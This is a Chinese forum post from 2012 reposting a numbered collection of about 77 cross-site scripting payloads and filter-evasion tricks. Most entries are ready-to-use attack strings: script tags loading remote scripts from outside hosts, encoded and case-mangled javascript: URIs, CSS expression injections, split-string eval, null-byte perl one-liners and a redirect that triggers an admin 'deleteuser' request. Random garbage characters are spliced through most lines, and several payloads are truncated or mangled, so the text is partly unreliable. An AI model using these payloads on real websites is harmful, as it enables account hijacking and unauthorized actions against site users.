中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]

作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. {  ^2 p5 H& {2 N5 r  |) E6 u9 }
6 Y9 d' ]" U! L, Q (1)普通的XSS JavaScript注入8 O8 w. _5 o' Q& \- f2 L
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' @8 C* q+ D+ t( K+ D- h6 j3 }# \, @6 r9 a  U  k
(2)IMG标签XSS使用JavaScript命令
# o* U1 u& B- ]- Y/ y' m <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& g# ~  W# C1 Y9 E# k4 S' I9 ]& d/ i4 P+ r
(3)IMG标签无分号无引号/ a: x+ D+ B2 R  |  v
<IMG SRC=javascript:alert(‘XSS’)>
7 p5 y# H! ~9 _+ Q& P# {! P( Q/ T5 \  u
(4)IMG标签大小写不敏感
6 j# y6 M3 |: m2 `" o+ F: ~  |; r <IMG SRC=JaVaScRiPt:alert(‘XSS’)>* F5 i7 @# u$ A: u5 }) m% r2 x2 m
: }/ v* w+ P2 H, }
(5)HTML编码(必须有分号)
4 U, g! t; y+ R: y <IMG SRC=javascript:alert(“XSS”)>
0 c& P/ o) y# ~- I- ~- K% l! S, H$ a7 o7 S! e6 y- y6 }) m
(6)修正缺陷IMG标签
, u* d) K0 X- |, U! a) } <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 A, \/ d2 E2 Z& m4 I2 v1 i

, m+ e0 ~( r; H2 E* ~2 R% C (7)formCharCode标签(计算器)
+ N. Z0 q9 M  d4 Q <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 G, M6 z+ G, _2 t5 B
! \% I8 c6 V8 ~& ]2 }" }
(8)UTF-8的Unicode编码(计算器)5 i  \& ^* o- G3 t' J3 G- _! a
<IMG SRC=jav..省略..S')>( `* d) X( l- J! j
2 i: r, I$ k1 g- `( k5 a( G
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
' e8 S( O7 I8 E; H; M <IMG SRC=jav..省略..S')>. k" F/ a4 O1 a

: B& y4 {3 c$ R# I (10)十六进制编码也是没有分号(计算器)6 p. v( G: p; L" ~" c) d
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>1 H+ b! e3 ^" X5 }* \! O/ A8 f
" r! V3 u! H8 U% s% C
(11)嵌入式标签,将Javascript分开
1 _% f8 o8 z1 K4 @# q4 E* {/ D <IMG SRC=”jav ascript:alert(‘XSS’);”>; p8 s5 t7 G- q2 P( p3 {' S
9 I$ s8 E5 f: ~/ y5 Z: B
(12)嵌入式编码标签,将Javascript分开+ G0 g! ]7 u# e! P$ F
<IMG SRC=”jav ascript:alert(‘XSS’);”>+ V' _: w0 h0 j. r- H* k
! ^) M) s/ a& N) X
(13)嵌入式换行符7 G; [! ]' t3 Y. J! b
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 y* @: l. R0 }' @: @) u1 T

1 S3 m& F; u, o& w (14)嵌入式回车- G( ], ^% ?: B  e: C; h) R$ J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 m# g( z* E! P- K; T( r( d' y9 s
+ `' f- b+ h# o5 e. { (15)嵌入式多行注入JavaScript,这是XSS极端的例子
' H4 Z6 R# G4 X% N <IMG SRC=”javascript:alert(‘XSS‘)”>  R, x0 ^' ]0 _
1 b$ a. R) D8 ~7 x9 h; ?. M
(16)解决限制字符(要求同页面)
2 q% I* v3 `  A% H/ k <script>z=’document.’</script>6 X$ o# n) ]  E
<script>z=z+’write(“‘</script>9 |. x7 K5 {& \$ O5 g, E+ B5 X0 J
<script>z=z+’<script’</script>* {* c6 l9 ]: |1 Q5 s4 L& Y9 i
<script>z=z+’ src=ht’</script># `0 i# ], ?# u
<script>z=z+’tp://ww’</script>
6 x& {* l2 }: n1 b; l0 y* q* Q; o <script>z=z+’w.shell’</script>
9 D$ a' ?/ A: l0 k4 j" J- z( p! H <script>z=z+’.net/1.’</script>  H3 v3 w' D( }5 s# A6 @3 B) Q& u
<script>z=z+’js></sc’</script>. |! g/ v+ A7 d3 ?" ~: R
<script>z=z+’ript>”)’</script>, ~0 ~1 u2 \' l' W- {/ B
<script>eval_r(z)</script>& p  x- v! a0 w& b

/ C) Y( l( j; q& u: r (17)空字符
! N+ U! V7 |# y  j/ ~0 I& M perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& |+ s  C1 |3 c8 Z; E- X5 D. \
9 N% P6 D# A% y" \( m& D, N
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; N  O( g3 ~5 X7 J+ n5 @
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
, G. j% i2 M: o6 M% m2 b' ?4 P6 q6 z& c5 i
(19)Spaces和meta前的IMG标签
5 @( l5 W$ x& O" S7 `" D <IMG SRC=”   javascript:alert(‘XSS’);”>" e3 v+ b8 A# `
0 L2 x4 g; Y+ Y2 D5 ?
(20)Non-alpha-non-digit XSS
0 r! E' F" A( S. W: p- a <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# G  z7 ~) I+ Z; r0 ]
4 X8 N3 g# ?6 F  [3 k% g  G1 G (21)Non-alpha-non-digit XSS to 2
1 d8 i# }4 }8 `, d: F <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 B6 t* z( l+ Z; Y3 ]

7 a( d* }; a# o0 ^0 t (22)Non-alpha-non-digit XSS to 3
7 P* S8 c3 o4 H2 s3 N <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ C) ]/ t" X. t2 b) \) L: D

  x) M$ X6 I+ L# ~7 V (23)双开括号  `( z/ J; l" D4 J" B$ Z
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: V% @- X/ U  f
7 v- _, i: F8 ^7 v5 q- I; N8 k$ n (24)无结束脚本标记(仅火狐等浏览器)
* o% C: B! ~  J: u6 Y) [ <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 _/ b# ]% s# F8 z1 E( H8 Z

" m7 B2 ?5 V( E* O, ~ (25)无结束脚本标记2, X/ x9 b$ u; R% _
<SCRIPT SRC=//3w.org/XSS/xss.js>! c% k- A* }% O* m3 r1 |; u

- T7 |" r3 S. L' @( W( o0 {: N6 e (26)半开的HTML/JavaScript XSS5 p, ]6 p/ [$ U4 s( t: e* z
<IMG SRC=”javascript:alert(‘XSS’)”4 p8 h2 @1 z- w( B6 x! P
+ U5 ?$ V5 m  \0 r0 r
(27)双开角括号
3 Z+ T/ j; t) K4 l; q <iframe src=http://3w.org/XSS.html <
. n, k1 `2 ]3 g: E1 y/ ]9 ~3 d' \) p
(28)无单引号 双引号 分号
+ I: M- e7 X! [ <SCRIPT>a=/XSS/+ Q! t% d0 P, y: v, H# O
alert(a.source)</SCRIPT>
2 q# L8 [# ]5 j" R, J' W9 m+ c1 O
4 ~, _4 u: |, P+ G7 c% s' _2 O (29)换码过滤的JavaScript6 t8 W% {0 A( }7 {
\”;alert(‘XSS’);//
/ v: f' O8 M  y# w
6 D$ j+ k; w6 a% e8 S* d( q (30)结束Title标签  [$ R5 Z9 ]1 ?. Z
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! Z, J% T0 z- S
2 v0 w% F1 k# K7 t
(31)Input Image
0 S( }# j# }1 }+ T- o <INPUT SRC=”javascript:alert(‘XSS’);”>
% K6 g  ~2 _  P
3 `$ c& K- U. ^" K! r (32)BODY Image
& G3 W& D7 c1 L <BODY BACKGROUND=”javascript:alert(‘XSS’)”>7 m* U# ?1 J1 n

: V. X7 E, |5 }8 U (33)BODY标签( c7 V8 Z+ \6 W+ h* ^2 i
<BODY(‘XSS’)>6 C! |6 C0 d" Z* V

  j/ |; d' y# v9 N8 V (34)IMG Dynsrc
8 M; b" b( j8 R <IMG DYNSRC=”javascript:alert(‘XSS’)”>" b2 q1 j# A- f" `7 f+ G6 n% h
5 z" \! F3 b% J1 N& ]& b+ b6 ?
(35)IMG Lowsrc6 T: w; }3 [4 M4 [) X
<IMG LOWSRC=”javascript:alert(‘XSS’)”>( r/ c' t( n; f  `( i
% |, G0 M8 V& _! ^& e: w
(36)BGSOUND7 v0 ]. @$ b* r6 B( c! {& f
<BGSOUND SRC=”javascript:alert(‘XSS’);”># p: D- [" a3 t: E( V  I" |) B
/ e  d; Q) f1 f* ^; q
(37)STYLE sheet
! F6 E2 t" g& J9 p! M <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
* }7 w& c9 f4 K* q
# T# O" H* s0 r' N (38)远程样式表! O/ W! z- D! N% i( V2 H! b6 U
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ ?0 X/ w! F: K% M9 S9 v) c8 U
9 h4 I+ _, U) y! D
(39)List-style-image(列表式)
% x( C/ o( @, ^  \ <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 i3 W& q1 S4 o4 ]7 m
: J" J0 H  I! ]9 I8 v3 ? (40)IMG VBscript
, C+ U5 X" _4 { <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS# D! z! r6 f, R
4 c* K" }7 G& u9 [# I3 [: ]9 \/ K- K
(41)META链接url# C. t5 \1 D; j; P" |4 g
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>. N  w" x$ \% P* B( P+ N( Y. Q
) g2 Q# Q( G  i: F- P- J/ a1 Q/ @
(42)Iframe0 a" k$ }$ h) u; O/ }  K
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
% F1 i. ^2 Y7 D: j# T4 U2 E9 X1 d  r5 f5 H- N: Y- [
(43)Frame) m! z' A& w: z  l8 ~' Y2 `  Z* D
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
1 ?5 s+ i, v' B9 m
+ y# G- j, \& B3 ?9 L3 Q9 M% Z4 u, v (44)Table
8 w# S! M- E$ |# {# I! U <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- B2 I4 o8 H! H: {" ?* `* X* K9 o' s0 h4 X$ z5 f8 z
(45)TD
& C. w% \" D5 g% u <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
$ }* @. e: f. [) y8 U) g- i3 B7 f. b# }3 Q/ s( r
(46)DIV background-image4 o' y; m( n" o) w* n: o* V+ J9 J
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 d. L' S) }0 S0 r
1 w" }2 R5 C7 P" n% N$ P (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
+ H8 s3 M4 x$ f  i) H% ]+ ?* H% @ <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ A" O6 T) V" X; C
3 c+ f5 @( D- J. B (48)DIV expression. g; F, D( k! T# t3 y" f: o$ ]
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& S7 Y# T4 L* x: x+ a
/ f- L" B& p+ b2 \3 q+ k! i
(49)STYLE属性分拆表达
7 s, ^. Z  t. S <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 R# @* f& }( L& U
0 v0 ~7 a0 t( \( _' G
(50)匿名STYLE(组成:开角号和一个字母开头)
, x8 x$ ^3 K) G9 b/ o# g( i5 B <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' F1 l- d! S2 Q. Z
1 ?# m' _. |0 A- X& }& D (51)STYLE background-image+ o) T. o0 W7 K$ a
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>  _1 I3 k: f& R1 z

' w7 |' K" d0 _6 {+ c (52)IMG STYLE方式& O7 `. q9 v9 Z! C
exppression(alert(“XSS”))’>0 A1 Q/ j' `' A- _4 U# n

% k( m; f% ]6 x4 l% G. H8 z (53)STYLE background! I- U/ {2 _' N7 ^3 s% Q" A" p
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! a0 K) ~. f# [1 `1 y/ C5 c# @( Y9 ^
(54)BASE
9 A/ a" z7 O0 E# l& _4 L" J3 Y# n <BASE HREF=”javascript:alert(‘XSS’);//”>
  ~& L) U' O4 E8 g
3 y* z3 J7 A. r2 O1 X0 k: {9 r (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& B1 E* B) @' h: D+ p
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: S5 V  A6 n& c! o+ R
2 E* t* x$ F! k. U: H4 a1 T
(56)在flash中使用ActionScrpt可以混进你XSS的代码$ Q! Z8 P% G; C- M+ Y) n
a=”get”;
  u# I2 z# @4 g3 g b=”URL(\”";9 v0 k0 o+ H5 a; I
c=”javascript:”;
8 `7 {$ o" ^- x* a  o  S! S d=”alert(‘XSS’);\”)”;
+ W$ ~1 x8 b% m/ w4 Y+ { eval_r(a+b+c+d);) Q$ h) P4 O* I/ P2 O! p

9 ^, K$ R% }# W (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上. o& A5 }9 ]! U8 e$ ~% h
<HTML xmlns:xss>
. P/ [; v, `8 N9 g <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
5 [$ a+ d  P$ r( Q2 { <xss:xss>XSS</xss:xss>: y5 ?- o9 D4 M* S. v, W0 B- k! M
</HTML>* v% G# H, g% g' t9 z  Z7 n
) F) z, t% `: G  P, [7 W( _, [7 R
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" {0 p$ V+ |- o  W: x <SCRIPT SRC=””></SCRIPT>% f$ J* t$ s" G% H9 u; ?
: Q' L& k* l2 U8 c) U7 p8 q
(59)IMG嵌入式命令,可执行任意命令
; t2 W+ y+ K( G! S; F: h, }5 P <IMG SRC=”http://www.XXX.com/a.php?a=b”>
# D  p+ l6 Y; C. G( V) o# @4 D8 S# @) x# \" h( E
(60)IMG嵌入式命令(a.jpg在同服务器)0 X: n2 H: Z; E6 x
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
$ u# g3 p; G* }% Y% z# w% b$ T' ?' X  H  u$ t% I/ n7 u  @' e* _, b
(61)绕符号过滤
  K" [* T- z0 j: L: y/ e6 h <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>! A6 d) g0 l5 |3 f+ f
5 q! |8 P0 Q8 ~7 r2 l$ C* Q/ P
(62)1 j; V4 I: ], Z! L4 N: @* {' ]# L
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 r# C8 C7 B/ A# F  M) R6 Y4 C$ F
9 ~  ^7 Y2 D% |2 ^3 i$ | (63)
7 _$ ^5 H1 s% f8 h, M <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>+ N' V5 ~. q* K% g3 C7 c1 E8 J

4 j3 z* N0 ^& Z1 e (64)
6 Q8 \# ~. x( r! G! C <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>/ J2 ?% L' U6 N1 w! m. M& H; b

$ h( w3 m8 [+ b" h; Z, g (65)
# v$ x( M* W4 G; ?5 k3 B <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 m9 d6 i5 U* C% t. L

4 g) I. m, t9 i (66)
- v. l) F% @2 [8 N$ t <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 K. ?* X# c* A* B" R8 q
) v0 ]+ Y8 }+ ]0 R$ k; Y, [ (67)
& N* {* K% v' |# T, A3 f <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>1 T1 P2 S0 j. \* |6 f$ P

1 k4 d' N  v: N% @7 L7 @ (68)URL绕行( b8 t, z# x5 G& Y% A/ I1 [
<A HREF=”http://127.0.0.1/”>XSS</A>
( I3 g7 V2 A5 w: O& x& E/ N# ^4 j% F, |1 z
(69)URL编码
4 f) [) S' O8 F8 p9 s) m6 \ <A HREF=”http://3w.org”>XSS</A>  V" A4 t/ s0 R9 u$ d/ ?
8 w: v/ Q5 E/ @4 f* H, f% D$ y
(70)IP十进制" D7 I: M# @0 _" `
<A HREF=”http://3232235521″>XSS</A>! h; b9 I; {0 i  M

$ `; B3 M0 @+ }/ T( F* z (71)IP十六进制0 j! p" M: O% p
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 C. @. v9 e" }' G: `7 l1 F, K* j
& ~% m. i1 A* c$ h4 E# K) M
(72)IP八进制( E% ~. M4 A0 n' `8 B' a  K
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
/ h+ k$ ]5 d# O8 i% P
  g7 p$ F6 Q7 S' W; x# n (73)混合编码
- ^8 z1 \; {3 S- e1 F5 Y5 R <A HREF=”h
1 C) ?8 S/ ~8 D4 ^% x tt p://6 6.000146.0×7.147/”">XSS</A>
! K9 r. L- B% k- ^/ M# t
" s1 N7 m) s, x0 G9 I  J  n* \  v! ]% h (74)节省[http:]
6 Z5 {1 {/ M! [5 ^, ? <A HREF=”//www.google.com/”>XSS</A>
) b. B) K, r5 i2 R5 Y* Q; ~, P) T$ M  T& P$ ?. C
(75)节省[www]4 |8 }" u( m. S3 i8 v* Y
<A HREF=”http://google.com/”>XSS</A>
( l; X( }& Z4 q) a0 X7 X
4 ]- q: E/ f( [ (76)绝对点绝对DNS
  Q- y/ N. i) i5 p/ m1 _- a5 ~ <A HREF=”http://www.google.com./”>XSS</A>+ s! A; j9 J0 Q

8 s8 ?. W7 H  Q4 X4 f# x (77)javascript链接) x# k# X# C# t
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2